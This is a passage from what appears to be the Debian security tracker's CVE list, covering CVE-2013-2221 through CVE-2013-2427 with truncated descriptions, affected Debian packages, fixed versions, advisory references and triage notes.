(JavaFX not part of OpenJDK) CVE-2013-2427 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-2426 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java 7) CVE-2013-2425 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only applies to Java 7) - openjdk-7 (Installation performed differently for Linux distros) CVE-2013-2424 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2423 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only applies to Java 7) CVE-2013-2422 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2421 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java 7) CVE-2013-2420 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2419 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-3187-1 DLA-219-1} - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 - icu 52.1-1 CVE-2013-2418 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2417 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-2416 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2415 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 7) CVE-2013-2414 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-2413 (Unspecified vulnerability in the Siebel Enterprise Application Integra ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-2412 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-7 7u25-2.3.10-1 - openjdk-6 6b27-1.12.6-1 CVE-2013-2411 (Unspecified vulnerability in the Primavera P6 Enterprise Project Portf ...) NOT-FOR-US: Oracle Primavera Products CVE-2013-2410 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2409 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2408 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2407 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-2727-1 DSA-2722-1} - openjdk-6 6b27-1.12.6-1 - openjdk-7 7u25-2.3.10-1 CVE-2013-2406 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2405 (Unspecified vulnerability in the Primavera P6 Enterprise Project Portf ...) NOT-FOR-US: Oracle Primavera Products CVE-2013-2404 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2403 (Unspecified vulnerability in the Siebel Enterprise Application Integra ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-2402 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2401 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2400 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-2399 (Unspecified vulnerability in the Siebel Call Center component in Oracl ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-2398 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-2397 (Unspecified vulnerability in the Oracle Retail Central Office componen ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-2396 (Unspecified vulnerability in the Oracle Applications Manager component ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-2395 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...) - mysql-5.5 (Only affects MySQL 5.6) - mysql-5.1 (Only affects MySQL 5.6) CVE-2013-2394 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-2393 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-2392 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...) {DSA-2780-1 DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-2391 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...) {DSA-2780-1 DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-2390 (Unspecified vulnerability in the Oracle WebLogic Server component in O ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-2389 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...) {DSA-2780-1 DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 CVE-2013-2388 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-2387 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2386 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2385 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2384 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-3187-1 DLA-219-1} - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 - icu 52.1-1 CVE-2013-2383 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) {DSA-3187-1 DLA-219-1} - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 - icu 52.1-1 CVE-2013-2382 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2381 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...) - mysql-5.1 (Only affects MySQL 5.6) - mysql-5.5 (Only affects MySQL 5.6) CVE-2013-2380 (Unspecified vulnerability in the Oracle JRockit component in Oracle Fu ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-2379 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2378 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 a ...) {DSA-2780-1} - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-2377 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-2376 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.1 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5 and 5.6) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-2375 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...) {DSA-2780-1 DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) CVE-2013-2374 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-2373 (The Engine in TIBCO Spotfire Web Player 3.3.x before 3.3.3, 4.0.x befo ...) NOT-FOR-US: TIBCO Spotfire Web Player CVE-2013-2372 (Cross-site scripting (XSS) vulnerability in the Engine in TIBCO Spotfi ...) NOT-FOR-US: TIBCO Spotfire Web Player CVE-2013-2371 (The Web API in the Statistics Server in TIBCO Spotfire Statistics Serv ...) NOT-FOR-US: TIBCO Spotfire Statistics CVE-2013-2370 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...) NOT-FOR-US: HP LoadRunner CVE-2013-2369 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...) NOT-FOR-US: HP LoadRunner CVE-2013-2368 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...) NOT-FOR-US: HP LoadRunner CVE-2013-2367 (Multiple unspecified vulnerabilities in HP SiteScope 11.20 and 11.21, ...) NOT-FOR-US: HP SiteScope CVE-2013-2366 (Unspecified vulnerability in HP Business Process Monitor 9.13.1 patch ...) NOT-FOR-US: HP Business Process Monitor CVE-2013-2365 (HP Database and Middleware Automation (DMA) 10.x before 10.10, when SS ...) NOT-FOR-US: HP DMA CVE-2013-2364 (Cross-site scripting (XSS) vulnerability in HP System Management Homep ...) NOT-FOR-US: HP SMH CVE-2013-2363 (HP System Management Homepage (SMH) before 7.2.1 allows remote attacke ...) NOT-FOR-US: HP SMH CVE-2013-2362 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...) NOT-FOR-US: HP SMH CVE-2013-2361 (Cross-site scripting (XSS) vulnerability in HP System Management Homep ...) NOT-FOR-US: HP SMH CVE-2013-2360 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...) NOT-FOR-US: HP SMH CVE-2013-2359 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...) NOT-FOR-US: HP SMH CVE-2013-2358 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...) NOT-FOR-US: HP SMH CVE-2013-2357 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...) NOT-FOR-US: HP SMH CVE-2013-2356 (HP System Management Homepage (SMH) before 7.2.1 allows remote attacke ...) NOT-FOR-US: HP SMH CVE-2013-2355 (HP System Management Homepage (SMH) before 7.2.1 allows remote attacke ...) NOT-FOR-US: HP SMH CVE-2013-2354 REJECTED CVE-2013-2353 (Unspecified vulnerability in HP StoreOnce D2D Backup System 1.x before ...) NOT-FOR-US: HP CVE-2013-2352 (LeftHand OS (aka SAN iQ) 10.5 and earlier on HP StoreVirtual Storage d ...) NOT-FOR-US: HP CVE-2013-2351 (Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.00, 9. ...) NOT-FOR-US: HP Network Node Manager CVE-2013-2350 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...) NOT-FOR-US: Data Protector CVE-2013-2349 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...) NOT-FOR-US: Data Protector CVE-2013-2348 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...) NOT-FOR-US: Data Protector CVE-2013-2347 (The Backup Client Service (OmniInet.exe) in HP Storage Data Protector ...) NOT-FOR-US: Data Protector CVE-2013-2346 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...) NOT-FOR-US: Data Protector CVE-2013-2345 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...) NOT-FOR-US: Data Protector CVE-2013-2344 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...) NOT-FOR-US: Data Protector CVE-2013-2343 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance hyd ...) NOT-FOR-US: HP CVE-2013-2342 (The HP StoreOnce D2D backup system with software before 3.0.0 has a de ...) NOT-FOR-US: HP StoreOnce D2D backup system CVE-2013-2341 (Unspecified vulnerability on the HP ProCurve JC###A, JC###B, JD###A, J ...) NOT-FOR-US: HP CVE-2013-2340 (Unspecified vulnerability on the HP ProCurve JC###A, JC###B, JD###A, J ...) NOT-FOR-US: HP CVE-2013-2339 (HP Smart Zero Core 4.3 and 4.3.1 on the t410 All-in-One Smart Zero Cli ...) NOT-FOR-US: HP Smart Zero Client CVE-2013-2338 (Unspecified vulnerability on HP Integrated Lights-Out 3 (aka iLO3) car ...) NOT-FOR-US: HP Integrated Lights-Out CVE-2013-2337 (Cross-site scripting (XSS) vulnerability in HP Service Manager 7.11, 9 ...) NOT-FOR-US: HP Service Manager CVE-2013-2336 (HP Service Manager 7.11, 9.21, 9.30, and 9.31, and ServiceCenter 6.2.8 ...) NOT-FOR-US: HP Service Manager CVE-2013-2335 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2334 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2333 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2332 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2331 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2330 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2329 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2328 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2327 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2326 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2325 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2324 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...) NOT-FOR-US: HP Storage Data Protector CVE-2013-2323 (HP SQL/MX 3.0 through 3.2 on NonStop servers, when SQL/MP Objects are ...) NOT-FOR-US: HP CVE-2013-2322 (HP SQL/MX 3.2 and earlier on NonStop servers, when SQL/MP Objects are ...) NOT-FOR-US: HP CVE-2013-2321 (Cross-site scripting (XSS) vulnerability in HP Service Manager Web Tie ...) NOT-FOR-US: HP Service Manager CVE-2013-2320 RESERVED CVE-2013-2319 (FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.5 ...) NOT-FOR-US: FileMaker Pro CVE-2013-2318 (The Content Provider in the MovatwiTouch application before 1.793 and ...) NOT-FOR-US: MovatwiTouch CVE-2013-2317 (The Sleipnir Mobile application 2.9.1 and earlier and Sleipnir Mobile ...) NOT-FOR-US: Sleipnir Mobile CVE-2013-2316 (The Yahoo! Browser application 1.4.4 and earlier for Android allows re ...) NOT-FOR-US: Yahoo! Browser application for Android CVE-2013-2315 (data/class/pages/forgot/LC_Page_Forgot.php in LOCKON EC-CUBE 2.11.0 th ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-2314 (Cross-site scripting (XSS) vulnerability in the adminAuthorization fun ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-2313 (Session fixation vulnerability in LOCKON EC-CUBE 2.11.0 through 2.12.3 ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-2312 (Cross-site scripting (XSS) vulnerability in the shopping-cart screen i ...) NOT-FOR-US: LOCKON EC-CUBE CVE-2013-2311 (Cross-site scripting (XSS) vulnerability in static/js/share.js (aka th ...) - web2py (Vulnerable code not present) CVE-2013-2310 (SoftBank Wi-Fi Spot Configuration Software, as used on SoftBank SHARP ...) NOT-FOR-US: SoftBank Wi-Fi Spot Configuration Software CVE-2013-2309 (Cross-site scripting (XSS) vulnerability in the management screen in O ...) NOT-FOR-US: OpenPNE CVE-2013-2308 (The (1) OWA Helper and (2) OSG Lite programs in SoftBank Online Servic ...) NOT-FOR-US: SoftBank Online Service Gate CVE-2013-2307 (The Yahoo! Browser application before 1.4.3 for Android allows remote ...) NOT-FOR-US: Yahoo! Browser application for Android CVE-2013-2306 (The jigbrowser+ application before 1.6.4 for Android does not properly ...) NOT-FOR-US: jigbrowser+ application for Android CVE-2013-2305 (Cross-site request forgery (CSRF) vulnerability in Cybozu Office befor ...) NOT-FOR-US: Cybozu CVE-2013-2304 (The Sleipnir Mobile application 2.8.0 and earlier and Sleipnir Mobile ...) NOT-FOR-US: Sleipnir CVE-2013-2303 (Sleipnir 4.0.0.4000 and earlier on Windows allows remote attackers to ...) NOT-FOR-US: Sleipnir CVE-2013-2302 (TransWARE Active! mail 6, when an external public interface is used, a ...) NOT-FOR-US: TransWARE Active! mail CVE-2013-2301 (The OMRON OpenWnn application before 1.3.6 for Android uses weak permi ...) NOT-FOR-US: OpenWnn application CVE-2013-2300 (The FlickWnn (aka OpenWnn/Flick support) application 2.02 and earlier ...) NOT-FOR-US: FlickWnn Android App CVE-2013-2299 (Cross-site scripting (XSS) vulnerability in Advantech WebAccess (forme ...) NOT-FOR-US: Advantech WebAccess CVE-2013-2298 (Multiple stack-based buffer overflows in the XML parser in BOINC 7.x a ...) - boinc 7.0.65+dfsg-1 (low) [wheezy] - boinc (Minor issue, only exploitable by a rogue BOINC server) [squeeze] - boinc (Minor issue, only exploitable by a rogue BOINC server) NOTE: http://boinc.berkeley.edu/gitweb/?p=boinc-v2.git;a=commitdiff;h=2fea03824925cbcb976f4191f4d8321e41a4d95b CVE-2013-2297 (Eucalyptus EuStore sets a blank root password in the default configura ...) - eucalyptus CVE-2013-2296 (Walrus in Eucalyptus before 3.2.2 does not verify authorization for th ...) - eucalyptus (bug #707592) NOTE: commit: https://github.com/eucalyptus/eucalyptus/commit/da7bb8b7c15d453e62df38eff5c12d0998e6eab1 NOTE: https://eucalyptus.atlassian.net/browse/EUCA-3074 CVE-2013-2295 RESERVED CVE-2013-2294 (Multiple cross-site scripting (XSS) vulnerabilities in ViewGit before ...) NOT-FOR-US: ViewGit CVE-2013-2293 (The CTransaction::FetchInputs method in bitcoind and Bitcoin-Qt before ...) - bitcoin 0.8.1-2 (bug #705265) CVE-2013-2292 (bitcoind and Bitcoin-Qt 0.8.0 and earlier allow remote attackers to ca ...) - bitcoin 0.8.1-1 CVE-2013-2291 RESERVED CVE-2013-2290 (Cross-site scripting (XSS) vulnerability in the dashboard of the Aruba ...) NOT-FOR-US: Aruba Networks ArubaOS CVE-2013-2289 (Cross-site scripting (XSS) vulnerability in admin/templates/default.ph ...) NOT-FOR-US: Batavi CVE-2013-2288 RESERVED CVE-2013-2287 (Multiple cross-site scripting (XSS) vulnerabilities in views/notify.ph ...) NOT-FOR-US: WordPress plugin Uploader CVE-2013-2286 RESERVED CVE-2013-2285 RESERVED CVE-2013-2284 RESERVED CVE-2013-2283 RESERVED CVE-2013-2282 RESERVED CVE-2013-2281 RESERVED CVE-2013-2280 RESERVED CVE-2013-2279 (CA SiteMinder Federation (FSS) 12.5, 12.0, and r6; Federation (Standal ...) NOT-FOR-US: CA SiteMinder CVE-2013-2278 (Unspecified vulnerability in War FTP Daemon (warftpd) 1.82, when runni ...) NOT-FOR-US: War FTP Daemon CVE-2013-2277 (The ff_h264_decode_seq_parameter_set function in h264_ps.c in libavcod ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.6-1 (bug #703200) CVE-2013-2276 (The avcodec_decode_audio4 function in utils.c in libavcodec in FFmpeg ...) - ffmpeg (Doesn't affect libav, specific to current ffmpeg) - libav (Doesn't affect libav, specific to current ffmpeg) CVE-2013-2275 (The default configuration for puppet masters 0.25.0 and later in Puppe ...) {DSA-2643-1} - puppet 2.7.18-3 CVE-2013-2274 (Puppet 2.6.x before 2.6.18 and Puppet Enterprise 1.2.x before 1.2.7 al ...) {DSA-2643-1} - puppet 2.7-1 NOTE: Only affects puppet 2.6.x CVE-2013-2273 (bitcoind and Bitcoin-Qt before 0.4.9rc1, 0.5.x before 0.5.8rc1, 0.6.0 ...) - bitcoin 0.8.1-1 CVE-2013-2272 (The penny-flooding protection mechanism in the CTxMemPool::accept meth ...) - bitcoin 0.8.1-2 (bug #705266) CVE-2013-2271 (The D-Link DSL-2740B Gateway with firmware EU_1.0, when an active admi ...) NOT-FOR-US: D-Link DSL-2740B Gateway CVE-2013-2270 (Cross-site scripting (XSS) vulnerability in the administration page in ...) NOT-FOR-US: Airvana CVE-2013-2269 (The Sponsorship Confirmation functionality in Aruba Networks ClearPass ...) NOT-FOR-US: Aruba Networks ClearPass CVE-2013-2268 (Unspecified vulnerability in the MathML implementation in WebKit in Go ...) - chromium-browser 25.0.1364.97-1 [squeeze] - chromium-browser (Vulnerable code not present) NOTE: MathML added in chromium 24.x, disabled again in 25.x CVE-2013-2267 (PHP Code Injection vulnerability in FUDforum Bulletin Board Software 3 ...) NOT-FOR-US: FUDforum CVE-2013-2266 (libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5 ...) {DSA-2656-1} - bind9 1:9.8.4.dfsg.P1-6+nmu1 (bug #704174) CVE-2013-2265 RESERVED CVE-2013-2264 (The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, ...) - asterisk 1:1.8.13.1~dfsg-2 (low; bug #704114) [squeeze] - asterisk (Minor information leak) NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-21013 CVE-2013-2263 (Unspecified vulnerability in Citrix Access Gateway Standard Edition 5. ...) NOT-FOR-US: Citrix Access Gateway CVE-2013-2262 (Cryptocat strophe.js before 2.0.22 has information disclosure ...) NOT-FOR-US: Cryptocat CVE-2013-2261 (Cryptocat before 2.0.22 Chrome Extension 'img/keygen.gif' has Informat ...) NOT-FOR-US: Cryptocat CVE-2013-2260 (Cryptocat before 2.0.22: Cryptocat.random() Function Array Key has Ent ...) NOT-FOR-US: Cryptocat CVE-2013-2259 (Cryptocat before 2.0.22 has Arbitrary Code Execution on Firefox Conver ...) NOT-FOR-US: Cryptocat CVE-2013-2258 (Cryptocat before 2.0.22 has Nickname User Impersonation ...) NOT-FOR-US: Cryptocat CVE-2013-2257 (Cryptocat before 2.0.42 has Group Chat ECC Private Key Generation Brut ...) NOT-FOR-US: Cryptocat CVE-2013-2256 (OpenStack Compute (Nova) before 2013.1.3 and Havana before havana-2 do ...) - nova 2013.1.2-3 (bug #718905) [wheezy] - nova (Affected code not present) CVE-2013-2255 (HTTPSConnections in OpenStack Keystone 2013, OpenStack Compute 2013.1, ...) - keystone 2014.1-1 [wheezy] - keystone (Minor issue) - swift (See https://bugs.launchpad.net/keystone/+bug/1188189/comments/5) NOTE: Fixes for keystone: https://review.openstack.org/#/c/76476/ CVE-2013-2254 (The deepGetOrCreateNode function in impl/operations/AbstractCreateOper ...) NOT-FOR-US: Apache Sling CVE-2013-2253 RESERVED CVE-2013-2252 RESERVED CVE-2013-2251 (Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute ...) - libstruts1.2-java (Only affect 2.x) CVE-2013-2250 (Apache Open For Business Project (aka OFBiz) 10.04.01 through 10.04.05 ...) NOT-FOR-US: Apache OFBiz CVE-2013-2249 (mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Ser ...) - apache2 2.4.6-1 [wheezy] - apache2 (mod_session_dbd available apache 2.3 and later only) [squeeze] - apache2 (mod_session_dbd available apache 2.3 and later only) CVE-2013-2248 (Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through ...) - libstruts1.2-java (Only affect 2.x) CVE-2013-2247 (The Fast Permissions Administration module 6.x-2.x before 6.x-2.5 and ...) NOT-FOR-US: Fast Permissions Administration Drupal contributed module CVE-2013-2246 (mod/feedback/lib.php in Moodle through 2.1.10, 2.2.x before 2.2.11, 2. ...) - moodle 2.5.1-1 (low) [squeeze] - moodle (Minor issue) NOTE: https://moodle.org/mod/forum/discuss.php?d=232503 CVE-2013-2245 (rss/file.php in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x befo ...) - moodle 2.5.1-1 (low) [squeeze] - moodle (Minor issue) NOTE: https://moodle.org/mod/forum/discuss.php?d=232502 CVE-2013-2244 (Multiple cross-site scripting (XSS) vulnerabilities in lib/conditionli ...) - moodle (Only affects 2.4.x and 2.5.x) NOTE: https://moodle.org/mod/forum/discuss.php?d=232501 CVE-2013-2243 (mod/lesson/pagetypes/matching.php in Moodle through 2.2.11, 2.3.x befo ...) - moodle 2.5.1-1 (low) [squeeze] - moodle (Minor issue) NOTE: https://moodle.org/mod/forum/discuss.php?d=232500 CVE-2013-2242 (mod/chat/gui_sockets/index.php in Moodle through 2.1.10, 2.2.x before ...) - moodle 2.5.1-1 (low) [squeeze] - moodle (Minor issue) NOTE: https://moodle.org/mod/forum/discuss.php?d=232498 CVE-2013-2241 (modules/gallery/helpers/data_rest.php in Gallery 3 before 3.0.9 allows ...) - gallery3 (bug #511715) CVE-2013-2240 (lib/flowplayer.swf.php in Gallery 3 before 3.0.9 does not properly rem ...) - gallery3 (bug #511715) CVE-2013-2239 (vzkernel before 042stab080.2 in the OpenVZ modification for the Linux ...) {DSA-2766-1} - linux-2.6 (low) - linux (openvz flavour no longer included after Squeeze) CVE-2013-2238 (Multiple buffer overflows in the switch_perform_substitution function ...) - freeswitch (bug #389591) CVE-2013-2237 (The key_notify_policy_flush function in net/key/af_key.c in the Linux ...) {DSA-2766-1 DSA-2745-1} - linux-2.6 (low) - linux 3.9.4-1 (low) NOTE: https://github.com/torvalds/linux/commit/85dfb745ee40232876663ae206cba35f24ab2a40 CVE-2013-2236 (Stack-based buffer overflow in the new_msg_lsa_change_notify function ...) {DSA-2803-1} - quagga 0.99.22.4-1 (bug #726724) NOTE: http://lists.quagga.net/pipermail/quagga-dev/2013-July/010621.html CVE-2013-2235 RESERVED CVE-2013-2234 (The (1) key_notify_sa_flush and (2) key_notify_policy_flush functions ...) {DSA-2766-1 DSA-2745-1} - linux-2.6 - linux 3.10.1-1 CVE-2013-2233 (Ansible before 1.2.1 makes it easier for remote attackers to conduct m ...) - ansible 1.3.4+dfsg-1 (bug #714822) NOTE: https://github.com/ansible/ansible/issues/857 CVE-2013-2232 (The ip6_sk_dst_check function in net/ipv6/ip6_output.c in the Linux ke ...) {DSA-2766-1 DSA-2745-1} - linux-2.6 - linux 3.10.1-1 CVE-2013-2231 (Unquoted Windows search path vulnerability in the QEMU Guest Agent ser ...) - qemu (Only affects win32 build) CVE-2013-2230 (The qemu driver (qemu/qemu_driver.c) in libvirt before 1.1.1 allows re ...) - libvirt 1.1.0-3 (bug #715559) [jessie] - libvirt (Vulnerable code introduced in with commit abf75aea) [wheezy] - libvirt (Vulnerable code introduced in with commit abf75aea) [squeeze] - libvirt (Vulnerable code introduced in with commit abf75aea) CVE-2013-2229 REJECTED CVE-2013-2228 (SaltStack RSA Key Generation allows remote users to decrypt communicat ...) - salt 0.15.1-1 NOTE: https://github.com/saltstack/salt/commit/e8ce66cf688b43aeb3e716e78b1af3a08e9940e3 CVE-2013-2227 (GLPI 0.83.7 has Local File Inclusion in common.tabs.php. ...) - glpi 0.83.91-1 (bug #714720; unimportant) NOTE: Only supported behind an authenticated HTTP zone CVE-2013-2226 (Multiple SQL injection vulnerabilities in GLPI before 0.83.9 allow rem ...) - glpi 0.83.91-1 (bug #714720; unimportant) NOTE: Only supported behind an authenticated HTTP zone CVE-2013-2225 (inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attacker ...) - glpi 0.83.91-1 (bug #714720; unimportant) NOTE: Only supported behind an authenticated HTTP zone CVE-2013-2224 (A certain Red Hat patch for the Linux kernel 2.6.32 on Red Hat Enterpr ...) - linux-2.6 (Caused by RHEL backport) - linux (Caused by RHEL backport) CVE-2013-2223 (GNU ZRTPCPP before 3.2.0 allows remote attackers to obtain sensitive i ...) - libzrtpcpp 2.3.4-1 (bug #714650) [squeeze] - libzrtpcpp (Minor issue) [wheezy] - libzrtpcpp (Minor issue) CVE-2013-2222 (Multiple stack-based buffer overflows in GNU ZRTPCPP before 3.2.0 allo ...) - libzrtpcpp 2.3.4-1 (bug #714650) [squeeze] - libzrtpcpp (Minor issue) [wheezy] - libzrtpcpp (Minor issue) CVE-2013-2221 (Heap-based buffer overflow in the ZRtp::storeMsgTemp function in GNU Z ...) - libzrtpcpp 2.3.4-1 (bug #714650) [squeeze] - libzrtpcpp 